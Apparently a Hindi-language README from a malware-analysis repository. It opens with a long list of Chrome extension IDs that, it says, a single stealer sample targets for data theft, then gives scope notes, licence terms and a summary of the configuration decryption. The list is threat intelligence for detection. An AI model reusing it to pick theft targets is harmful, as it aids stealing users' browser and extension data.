hbneiaclpaaglopiogfdhgccebncnjmc hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi lnnnmfcpbkafcpgdilckhmhbkkbpkmid
loinekcabhlmhjjbocijdoimmejangoa lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe njoljnomkdoakfphjbapdopdcneceeaf
nkbihfbeogaeaoehlefnkodbefgpgknn nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm olgpchjlegmakkhfbahgnjojlefnealp
olkbchllhcflpbjfgagahpkjnjioiedg omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo ppdadbejkmjnefldpcdjhnkpbjkikoip
दायरा और सीमाएँ
- यह रिपॉजिटरी एक एकल मैलवेयर नमूने और उसके एम्बेडेड कॉन्फ़िगरेशन के स्टैटिक विश्लेषण और डिक्रिप्शन का दस्तावेजीकरण करती है।
- अभियान का श्रेय विश्लेषणात्मक है, जो पुनर्प्राप्त बुनियादी ढांचे और TTP ओवरलैप पर आधारित है; यह कानून प्रवर्तन का श्रेय कथन नहीं है।
- सूचीबद्ध Chrome एक्सटेंशन ID डेटा चोरी के लिए लक्षित वैध एक्सटेंशन की पहचान करते हैं, दुर्भावनापूर्ण एक्सटेंशन नहीं।
- उत्पादन में तैनाती से पहले डिटेक्शन नियमों को गंतव्य वातावरण में मान्य और ट्यून किया जाना चाहिए।
- STIX बंडल STIX 2.1 का अनुसरण करता है लेकिन पठनीयता के लिए सरलीकृत ID का उपयोग करता है; यदि डीकॉन्फ्लिक्शन की आवश्यकता हो तो उत्पादन CTI प्लेटफॉर्म में आयात करने से पहले UUID पुनः उत्पन्न करें।
रिलीज़ इतिहास
संस्करणित अपडेट के लिए CHANGELOG.md देखें।
योगदान
दिशानिर्देश, मुद्दा टेम्पलेट और PR चेकलिस्ट के लिए CONTRIBUTING.md देखें।
लाइसेंस
विश्लेषण पाठ और स्क्रिप्ट MIT License के तहत जारी किए गए हैं। IOC सूचियाँ और खतरा-खुफिया सामग्री रक्षात्मक उद्देश्यों के लिए प्रदान की गई हैं; लाइसेंस शर्तों के तहत वाणिज्यिक उत्पादों में पुन: उपयोग की अनुमति है।
सैंडबॉक्स्ड वातावरण में स्वतंत्र रिवर्स इंजीनियरिंग। एन्क्रिप्टेड कॉन्फ़िगरेशन को स्टैटिक विश्लेषण और प्रति-हेल्पर CPU अनुकरण द्वारा पुनर्प्राप्त किया गया। scripts/decrypt_all.py और SECURITY.md देखें।